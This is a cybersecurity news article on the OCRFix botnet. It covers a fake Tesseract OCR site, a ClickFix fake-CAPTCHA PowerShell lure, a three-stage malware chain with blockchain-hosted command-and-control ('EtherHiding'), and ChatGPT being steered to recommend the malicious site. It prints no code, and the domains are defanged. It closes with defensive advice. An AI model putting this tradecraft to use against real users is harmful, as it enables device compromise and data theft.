A newly uncovered cyber threat, known as the OCRFix botnet, is leveraging advanced tactics to build a stealthy network of compromised devices. Combining social engineering with blockchain technology, this campaign is proving difficult to detect and dismantle.
The OCRFix operation integrates ClickFix phishing strategies and a novel method called EtherHiding, which stores command instructions on a blockchain. This approach complicates traditional takedown efforts, as attacker directives are stored on a decentralized platform.
Phishing Tactics and Initial Entry
The attack begins with a fraudulent website mimicking tesseract-ocr[.]com, a deceptive version of the legitimate Tesseract OCR tool. The absence of an official website for the open-source project made it an easy target for domain impersonation.
In addition to exploiting SEO and LLM poisoning, where the ChatGPT chatbot inadvertently directed users to the malicious site, a YouTube video was also found promoting these deceptive instructions.
Cyjax analysts discovered the campaign during routine monitoring, noting that the phishing site used a fake CAPTCHA to trick users. Upon clicking ‘verify,’ a hidden PowerShell command is copied to the user’s clipboard, instructing them to paste it into Windows PowerShell under the guise of a verification step.
Malware Deployment and Infection Chain
The PowerShell command connects to a server at opsecdefcloud[.]com, downloading a harmful MSI file that initiates the malware deployment. Victims are then redirected to the legitimate Tesseract GitHub page to maintain the illusion of authenticity.
The malware unfolds in three stages, beginning with Update1.exe, which retrieves a C2 address from a BNB TestNet smart contract. It then downloads a data.zip package from attacker-controlled servers.
Subsequent stages involve setup_helper.exe establishing persistence through a scheduled task, and CfgHelper.exe acting as a bot listener, sending victim data to a control panel at ldture[.]com. Cyrillic comments in the source code suggest a possible Russian origin, though this remains speculative.
Leveraging Blockchain for Command and Control
A unique aspect of OCRFix is its use of EtherHiding for C2 communications. By embedding C2 URLs in BNB Smart Chain TestNet smart contracts, attackers evade traditional server blockades and can update URLs directly on the blockchain.
This technique, previously associated with North Korean actors, indicates wider adoption among cybercriminals. The blockchain’s immutable nature allows attackers to alter command addresses without fear of takedowns.
Organizations are advised to restrict PowerShell execution and enable script block logging to detect such obfuscations. Security training should emphasize the dangers of fake CAPTCHA prompts and pasting unknown commands. Network monitoring for public blockchain node connections is also recommended.
Stay informed by following us on Google News, LinkedIn, and X for more updates. Set CSN as a preferred source on Google for ongoing cybersecurity insights.
